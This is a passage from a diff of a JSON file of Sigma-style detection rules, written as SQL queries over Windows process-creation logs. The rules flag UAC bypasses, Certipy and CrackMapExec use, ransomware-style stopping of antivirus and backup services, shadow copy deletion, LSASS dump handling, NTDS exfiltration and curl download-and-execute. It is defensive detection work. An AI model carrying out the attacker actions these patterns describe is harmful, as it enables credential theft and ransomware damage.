ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", + "status": "experimental", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "status": "experimental", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { "title": "Suspicious Regsvr32 Execution With Image Extension", @@ -12474,1656 +12115,1627 @@ "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", 